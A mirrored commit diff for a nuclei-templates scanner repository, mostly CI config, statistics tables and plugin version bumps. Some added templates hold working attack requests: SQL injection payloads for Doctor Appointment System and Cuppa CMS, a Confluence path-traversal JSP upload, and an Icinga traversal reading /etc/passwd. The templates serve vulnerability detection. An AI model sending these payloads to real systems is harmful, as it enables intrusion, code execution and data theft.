daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'main' into cve

patch-1
Ritik Chaddha 2023-05-13 20:07:47 +05:30 committed by GitHub
parent 992cc24928 23853a6f58
commit bffcfa759b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
109 changed files with 6515 additions and 3487 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
.github/auto_assign.yml vendored
View File

@ -6,9 +6,9 @@ addAssignees: true
# A list of reviewers to be added to pull requests (GitHub user name)
reviewers:
- ritikchaddha
- DhiyaneshGeek
- pussycat0x
- DhiyaneshGeek
- ritikchaddha
# A number of reviewers added to the pull request
# Set 0 to add all the reviewers (default: 0)
@ -16,9 +16,9 @@ numberOfReviewers: 1
# A list of assignees, overrides reviewers if set
assignees:
- ritikchaddha
- DhiyaneshGeek
- pussycat0x
- ritikchaddha
# A number of assignees to add to the pull request
# Set to 0 to add all of the assignees.

5
.github/workflows/cve-annotate.yml vendored
View File

@ -5,7 +5,7 @@ on:
branches:
- main
paths:
- 'cves/**.yaml'
- '**/cves/**.yaml'
workflow_dispatch:
jobs:
@ -35,8 +35,7 @@ jobs:
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git pull
git add cves
git add .
git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a
- name: Push changes

2
.github/workflows/cve2json.yml vendored
View File

@ -5,7 +5,7 @@ on:
branches:
- main
paths:
- 'cves/**'
- '**/cves/'
workflow_dispatch: # allows manual triggering of the workflow
jobs:

9
.github/workflows/template-checksum.yml vendored
View File

@ -12,7 +12,10 @@ jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Set up Go
uses: actions/setup-go@v4
with:
@ -23,12 +26,14 @@ jobs:
go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@dev
- name: generate checksum
id: checksum
run: |
generate-checksum /home/runner/work/nuclei-templates/nuclei-templates/ templates-checksum.txt
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
- name: Commit files
if: steps.checksum.outputs.CHANGES > 0
run: |
git pull
git add templates-checksum.txt
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"

36
.new-additions
View File

@ -1,26 +1,62 @@
file/keys/postman-api-key.yaml
headless/technologies/sap-spartacus.yaml
http/cves/2017/CVE-2017-17731.yaml
http/cves/2019/CVE-2019-3398.yaml
http/cves/2020/CVE-2020-27481.yaml
http/cves/2021/CVE-2021-27314.yaml
http/cves/2021/CVE-2021-27315.yaml
http/cves/2021/CVE-2021-27316.yaml
http/cves/2021/CVE-2021-27319.yaml
http/cves/2021/CVE-2021-27320.yaml
http/cves/2021/CVE-2021-30175.yaml
http/cves/2021/CVE-2021-44228.yaml
http/cves/2022/CVE-2022-24264.yaml
http/cves/2022/CVE-2022-24265.yaml
http/cves/2022/CVE-2022-24266.yaml
http/cves/2022/CVE-2022-24716.yaml
http/cves/2022/CVE-2022-27984.yaml
http/cves/2022/CVE-2022-27985.yaml
http/cves/2022/CVE-2022-3980.yaml
http/cves/2022/CVE-2022-42095.yaml
http/cves/2022/CVE-2022-42096.yaml
http/cves/2022/CVE-2022-4328.yaml
http/cves/2022/CVE-2022-45037.yaml
http/cves/2022/CVE-2022-45038.yaml
http/cves/2022/CVE-2022-46020.yaml
http/cves/2023/CVE-2023-1020.yaml
http/cves/2023/CVE-2023-1671.yaml
http/cves/2023/CVE-2023-20864.yaml
http/cves/2023/CVE-2023-25135.yaml
http/cves/2023/CVE-2023-26360.yaml
http/cves/2023/CVE-2023-27350.yaml
http/cves/2023/CVE-2023-27524.yaml
http/cves/2023/CVE-2023-29489.yaml
http/cves/2023/CVE-2023-29922.yaml
http/cves/2023/CVE-2023-30210.yaml
http/cves/2023/CVE-2023-30212.yaml
http/cves/2023/CVE-2023-31059.yaml
http/cves/2023/CVE-2023-32235.yaml
http/default-logins/powerjob-default-login.yaml
http/default-logins/umami/umami-default-login.yaml
http/exposed-panels/eclipse-birt-panel.yaml
http/exposed-panels/jedox-web-panel.yaml
http/exposed-panels/oracle-opera-login.yaml
http/exposed-panels/papercut-ng-panel.yaml
http/exposed-panels/proxmox-panel.yaml
http/exposed-panels/red-lion-panel.yaml
http/exposed-panels/sophos-web-appliance.yaml
http/exposures/configs/platformio-ini.yaml
http/exposures/logs/nginx-shards.yaml
http/exposures/tokens/postman/postman-key.yaml
http/fuzzing/ssrf-via-proxy.yaml
http/fuzzing/waf-fuzz.yaml
http/misconfiguration/apache/apache-zeppelin-unauth.yaml
http/osint/mail-archive.yaml
http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml
http/vulnerabilities/generic/generic-env.yaml
http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml
http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
http/vulnerabilities/wordpress/wpml-xss.yaml
network/enumeration/smtp-commands-enum.yaml
network/enumeration/smtp/smtp-user-enum.yaml

24
.nuclei-ignore
View File

@ -23,15 +23,15 @@ tags:
# unless asked for by the user.
files:
- cves/2006/CVE-2006-1681.yaml
- cves/2007/CVE-2007-5728.yaml
- cves/2014/CVE-2014-9608.yaml
- cves/2018/CVE-2018-5233.yaml
- cves/2019/CVE-2019-14696.yaml
- cves/2020/CVE-2020-11930.yaml
- cves/2020/CVE-2020-19295.yaml
- cves/2020/CVE-2020-2036.yaml
- cves/2020/CVE-2020-28351.yaml
- cves/2021/CVE-2021-35265.yaml
- vulnerabilities/oracle/oracle-ebs-xss.yaml
- vulnerabilities/other/nginx-module-vts-xss.yaml
- http/cves/2006/CVE-2006-1681.yaml
- http/cves/2007/CVE-2007-5728.yaml
- http/cves/2014/CVE-2014-9608.yaml
- http/cves/2018/CVE-2018-5233.yaml
- http/cves/2019/CVE-2019-14696.yaml
- http/cves/2020/CVE-2020-11930.yaml
- http/cves/2020/CVE-2020-19295.yaml
- http/cves/2020/CVE-2020-2036.yaml
- http/cves/2020/CVE-2020-28351.yaml
- http/cves/2021/CVE-2021-35265.yaml
- http/vulnerabilities/oracle/oracle-ebs-xss.yaml
- http/vulnerabilities/other/nginx-module-vts-xss.yaml

26
README.md
View File

@ -40,20 +40,20 @@ An overview of the nuclei template project, including statistics on unique tags,
## Nuclei Templates Top 10 statistics
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1770 | dhiyaneshdk | 805 | cves | 1749 | info | 2816 | http | 5695 |
| panel | 873 | dwisiswant0 | 793 | exposed-panels | 865 | high | 1230 | file | 117 |
| wordpress | 769 | daffainfo | 662 | osint | 633 | medium | 1007 | network | 90 |
| wp-plugin | 660 | pikpikcu | 353 | technologies | 562 | critical | 654 | dns | 18 |
| exposure | 657 | pdteam | 278 | vulnerabilities | 554 | low | 215 | | |
| osint | 638 | pussycat0x | 235 | misconfiguration | 432 | unknown | 25 | | |
| xss | 624 | geeknik | 219 | exposures | 375 | | | | |
| tech | 599 | ricardomaia | 214 | token-spray | 240 | | | | |
| edb | 595 | ritikchaddha | 196 | workflows | 190 | | | | |
| lfi | 538 | 0x_akoko | 179 | default-logins | 128 | | | | |
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
| cve | 1805 | dhiyaneshdk | 815 | http | 5763 | info | 2830 | file | 118 |
| panel | 883 | dwisiswant0 | 794 | workflows | 190 | high | 1247 | dns | 18 |
| wordpress | 775 | daffainfo | 663 | file | 118 | medium | 1019 | | |
| wp-plugin | 666 | pikpikcu | 353 | network | 89 | critical | 671 | | |
| exposure | 661 | pdteam | 278 | dns | 18 | low | 215 | | |
| osint | 639 | pussycat0x | 237 | ssl | 11 | unknown | 26 | | |
| xss | 632 | geeknik | 220 | headless | 9 | | | | |
| tech | 602 | ricardomaia | 215 | cves.json | 1 | | | | |
| edb | 595 | ritikchaddha | 198 | contributors.json | 1 | | | | |
| lfi | 541 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | |
**382 directories, 6373 files**.
**395 directories, 6435 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

6567
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

24
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1770 | dhiyaneshdk | 805 | cves | 1749 | info | 2816 | http | 5695 |
| panel | 873 | dwisiswant0 | 793 | exposed-panels | 865 | high | 1230 | file | 117 |
| wordpress | 769 | daffainfo | 662 | osint | 633 | medium | 1007 | network | 90 |
| wp-plugin | 660 | pikpikcu | 353 | technologies | 562 | critical | 654 | dns | 18 |
| exposure | 657 | pdteam | 278 | vulnerabilities | 554 | low | 215 | | |
| osint | 638 | pussycat0x | 235 | misconfiguration | 432 | unknown | 25 | | |
| xss | 624 | geeknik | 219 | exposures | 375 | | | | |
| tech | 599 | ricardomaia | 214 | token-spray | 240 | | | | |
| edb | 595 | ritikchaddha | 196 | workflows | 190 | | | | |
| lfi | 538 | 0x_akoko | 179 | default-logins | 128 | | | | |
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
| cve | 1805 | dhiyaneshdk | 815 | http | 5763 | info | 2830 | file | 118 |
| panel | 883 | dwisiswant0 | 794 | workflows | 190 | high | 1247 | dns | 18 |
| wordpress | 775 | daffainfo | 663 | file | 118 | medium | 1019 | | |
| wp-plugin | 666 | pikpikcu | 353 | network | 89 | critical | 671 | | |
| exposure | 661 | pdteam | 278 | dns | 18 | low | 215 | | |
| osint | 639 | pussycat0x | 237 | ssl | 11 | unknown | 26 | | |
| xss | 632 | geeknik | 220 | headless | 9 | | | | |
| tech | 602 | ricardomaia | 215 | cves.json | 1 | | | | |
| edb | 595 | ritikchaddha | 198 | contributors.json | 1 | | | | |
| lfi | 541 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | |

2
helpers/wordpress/plugins/all-in-one-seo-pack.txt
View File

@ -1 +1 @@
4.3.6.1
4.3.7

2
helpers/wordpress/plugins/complianz-gdpr.txt
View File

@ -1 +1 @@
6.4.3
6.4.5

2
helpers/wordpress/plugins/elementor.txt
View File

@ -1 +1 @@
3.13.0
3.13.2

2
helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt
View File

@ -1 +1 @@
5.7.1
5.7.2

2
helpers/wordpress/plugins/ewww-image-optimizer.txt
View File

@ -1 +1 @@
6.9.3
7.0.0

2
helpers/wordpress/plugins/facebook-for-woocommerce.txt
View File

@ -1 +1 @@
3.0.22
3.0.23

1
helpers/wordpress/plugins/gdpr-cookie-compliance.txt Normal file
View File

@ -0,0 +1 @@
4.12.2

2
helpers/wordpress/plugins/google-listings-and-ads.txt
View File

@ -1 +1 @@
2.4.4
2.4.5

2
helpers/wordpress/plugins/gutenberg.txt
View File

@ -1 +1 @@
15.7.0
15.7.1

2
helpers/wordpress/plugins/header-footer-elementor.txt
View File

@ -1 +1 @@
1.6.13
1.6.14

2
helpers/wordpress/plugins/mailpoet.txt
View File

@ -1 +1 @@
4.14.0
4.15.0

2
helpers/wordpress/plugins/mainwp-child.txt
View File

@ -1 +1 @@
4.4.1
4.4.1.1

2
helpers/wordpress/plugins/nextgen-gallery.txt
View File

@ -1 +1 @@
3.35
3.36

2
helpers/wordpress/plugins/ninja-forms.txt
View File

@ -1 +1 @@
3.6.23
3.6.24

2
helpers/wordpress/plugins/post-smtp.txt
View File

@ -1 +1 @@
2.4.9
2.5.2

2
helpers/wordpress/plugins/shortpixel-image-optimiser.txt
View File

@ -1 +1 @@
5.2.1
5.2.2

2
helpers/wordpress/plugins/tablepress.txt
View File

@ -1 +1 @@
2.1.2
2.1.3

2
helpers/wordpress/plugins/w3-total-cache.txt
View File

@ -1 +1 @@
2.3.1
2.3.2

2
helpers/wordpress/plugins/widget-importer-exporter.txt
View File

@ -1 +1 @@
1.6
1.6.1

2
helpers/wordpress/plugins/woocommerce.txt
View File

@ -1 +1 @@
7.6.1
7.7.0

2
helpers/wordpress/plugins/wordpress-seo.txt
View File

@ -1 +1 @@
20.6
20.7

2
helpers/wordpress/plugins/yith-woocommerce-compare.txt
View File

@ -1 +1 @@
2.25.0
2.26.0

71
http/cves/2019/CVE-2019-3398.yaml Normal file
View File

@ -0,0 +1,71 @@
id: CVE-2019-3398
info:
name: Atlassian Confluence Download Attachments - Remote Code Execution
author: rootxharsh,iamnoooob,pdresearch
severity: high
description: |
Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.
reference:
- https://blogs.juniper.net/en-us/threat-research/cve-2019-3398-atlassian-confluence-download-attachments-remote-code-execution
- https://nvd.nist.gov/vuln/detail/CVE-2019-3398
tags: cve,cve2019,atlassian,confluence,rce,authenticated,intrusive,kev
variables:
num1: "{{rand_int(800000, 999999)}}"
num2: "{{rand_int(800000, 999999)}}"
result: "{{to_number(num1)*to_number(num2)}}"
http:
- raw:
- |
POST /dologin.action HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
os_username={{username}}&os_password={{password}}&login=Log%2Bin&os_destination=
- |
GET /pages/createpage.action HTTP/1.1
Host: {{Hostname}}
- |
POST /plugins/drag-and-drop/upload.action?draftId={{draftID}}&filename=../../../../../../opt/atlassian/confluence/confluence/pages/{{randstr}}.jsp&size=8&mimeType=text%2Fplain&atl_token={{csrftoken}} HTTP/1.1
Host: {{Hostname}}
${{{num1}}*{{num2}}}
- |
GET /pages/downloadallattachments.action?pageId={{draftID}} HTTP/1.1
Host: {{Hostname}}
- |
GET /pages/{{randstr}}.jsp HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body_5
words:
- "{{result}}"
extractors:
- type: regex
part: body
name: csrftoken
internal: true
group: 1
regex:
- 'name="atlassian\-token" content="([a-z0-9]+)"> '
- type: regex
part: body
name: draftID
internal: true
group: 1
regex:
- 'ta name="ajs\-draft\-id" content="([0-9]+)">'

2
http/cves/2020/CVE-2020-27481.yaml
View File

@ -16,7 +16,7 @@ info:
metadata:
max-request: 1
requests:
http:
- raw:
- |
@timeout: 15s

38
http/cves/2021/CVE-2021-27314.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2021-27314
info:
name: Doctor Appointment System 1.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
SQL injection in admin.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via username parameter at login page.
reference:
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
- http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-27314
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-27314
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm
http:
- raw:
- |
@timeout: 10s
POST /admin/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&password=test&submit=
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "Doctor Appoinment System")'
condition: and

38
http/cves/2021/CVE-2021-27315.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2021-27315
info:
name: Doctor Appointment System 1.0 - SQL Injection
author: theamanrawat
severity: high
description: |
Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the comment parameter.
reference:
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
- http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-27315
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-27315
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm
http:
- raw:
- |
@timeout: 10s
POST /contactus.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
firstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and

38
http/cves/2021/CVE-2021-27316.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2021-27316
info:
name: Doctor Appointment System 1.0 - SQL Injection
author: theamanrawat
severity: high
description: |
Blind SQL injection in contactus.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via lastname parameter.
reference:
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
- http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-27316
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-27316
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm
http:
- raw:
- |
@timeout: 10s
POST /contactus.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
firstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and

38
http/cves/2021/CVE-2021-27319.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2021-27319
info:
name: Doctor Appointment System 1.0 - SQL Injection
author: theamanrawat
severity: high
description: |
Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via email parameter.
reference:
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
- http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-27319
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-27319
cwe-id: CWE-89
metadata:
verified: "true"
tags: packetstorm,cve,cve2021,sqli,doctor-appointment-system
http:
- raw:
- |
@timeout: 10s
POST /contactus.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
firstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and

38
http/cves/2021/CVE-2021-27320.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2021-27320
info:
name: Doctor Appointment System 1.0 - SQL Injection
author: theamanrawat
severity: high
description: |
Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter.
reference:
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
- http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-27320
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-27320
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm
http:
- raw:
- |
@timeout: 10s
POST /contactus.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
firstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and

2
http/cves/2021/CVE-2021-41381.yaml
View File

@ -19,7 +19,7 @@ info:
epss-score: 0.01387
metadata:
max-request: 1
tags: cve,cve2021,payara,lfi
tags: cve,cve2021,payara,lfi,packetstorm
http:
- method: GET

2
http/cves/2021/CVE-2021-41648.yaml
View File

@ -19,7 +19,7 @@ info:
epss-score: 0.02296
metadata:
max-request: 1
tags: cve,cve2021,sqli
tags: cve2021,sqli,packetstorm,cve
http:
- method: POST

2
http/cves/2021/CVE-2021-41826.yaml
View File

@ -19,7 +19,7 @@ info:
epss-score: 0.95073
metadata:
max-request: 1
tags: cve2021,placeos,redirect,edb,cve
tags: redirect,edb,cve,packetstorm,cve2021,placeos
http:
- method: GET

2
http/cves/2021/CVE-2021-44152.yaml
View File

@ -22,7 +22,7 @@ info:
verified: true
shodan-query: http.html:"Reprise License Manager"
google-query: inurl:"/goforms/menu"
tags: cve2021,rlm,auth-bypass,cve
tags: cve,packetstorm,cve2021,rlm,auth-bypass
http:
- method: GET

2
http/cves/2021/CVE-2021-44848.yaml
View File

@ -19,7 +19,7 @@ info:
epss-score: 0.00924
metadata:
max-request: 1
tags: virtualui,tenable,cve,cve2021,exposure,thinfinity
tags: cve,cve2021,exposure,thinfinity,packetstorm,virtualui,tenable
http:
- raw:

12
http/cves/2021/CVE-2021-45046.yaml
View File

@ -17,7 +17,7 @@ info:
cve-id: CVE-2021-45046
cwe-id: CWE-502
epss-score: 0.97416
tags: cve,cve2021,rce,oast,log4j,injection
tags: cve,cve2021,rce,oast,log4j,injection,kev
metadata:
max-request: 1
@ -55,19 +55,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/02/28

2
http/cves/2021/CVE-2021-45092.yaml
View File

@ -19,7 +19,7 @@ info:
epss-score: 0.69904
metadata:
max-request: 1
tags: iframe,thinfinity,tenable,cve,cve2021,injection
tags: packetstorm,iframe,thinfinity,tenable,cve,cve2021,injection
http:
- method: GET

2
http/cves/2021/CVE-2021-46381.yaml
View File

@ -18,7 +18,7 @@ info:
epss-score: 0.01125
metadata:
max-request: 1
tags: cve,cve2021,dlink,lfi,router
tags: lfi,router,packetstorm,cve,cve2021,dlink
http:
- method: POST

57
http/cves/2022/CVE-2022-24264.yaml Normal file
View File

@ -0,0 +1,57 @@
id: CVE-2022-24264
info:
name: Cuppa CMS v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter.
reference:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-24264
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-24264
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,cuppa,authenticated
variables:
num: '999999999'
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
POST /components/table_manager/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
search_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '{{md5(num)}}'
- 'td_available_languages'
condition: and
- type: word
part: header_2
words:
- "text/html"
- type: status
status:
- 200

46
http/cves/2022/CVE-2022-24265.yaml Normal file
View File

@ -0,0 +1,46 @@
id: CVE-2022-24265
info:
name: Cuppa CMS v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter.
reference:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-24265
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-24265
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,cuppa,authenticated
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
@timeout: 20s
POST /components/menu/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
path=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "menu/html/edit.php")'
condition: and

46
http/cves/2022/CVE-2022-24266.yaml Normal file
View File

@ -0,0 +1,46 @@
id: CVE-2022-24266
info:
name: Cuppa CMS v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter.
reference:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-24266
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-24266
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,cuppa,authenticated
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
@timeout: 20s
POST /components/table_manager/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
order_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "list_admin_table")'
condition: and

39
http/cves/2022/CVE-2022-24716.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2022-24716
info:
name: Icinga Web 2 - Arbitrary File Disclosure
author: DhiyaneshDK
severity: high
description: |
Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials.
remediation: This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated.
reference:
- https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py
metadata:
max-request: 3
shodan-query: title:"Icinga"
tags: cve,cve2023,icinga,lfi
http:
- method: GET
path:
- "{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd"
- "{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd"
